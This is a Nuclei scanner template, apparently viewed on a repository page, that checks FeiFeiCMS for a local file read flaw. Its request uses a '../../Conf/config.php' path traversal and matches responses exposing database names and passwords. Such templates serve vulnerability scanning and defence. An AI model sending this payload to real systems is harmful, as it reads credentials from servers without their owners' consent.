nuclei-templates/vulnerabilities/other/feifeicms-lfr.yaml

30 lines
600 B
YAML
Raw Normal View History

2021-04-07 14:24:35 +00:00
id: feifeicms-lfr
info:
name: FeiFeiCms Local File Read
2021-04-07 14:24:35 +00:00
author: princechaddha
severity: high
tags: feifeicms,lfi
reference:
- https://www.cnblogs.com/jinqi520/p/10202615.html
- https://gitee.com/daicuo/feifeicms
2021-04-07 14:24:35 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?s=Admin-Data-down&id=../../Conf/config.php"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<?php"
- "db_name"
- "db_pwd"
- "db_host"
condition: and
part: body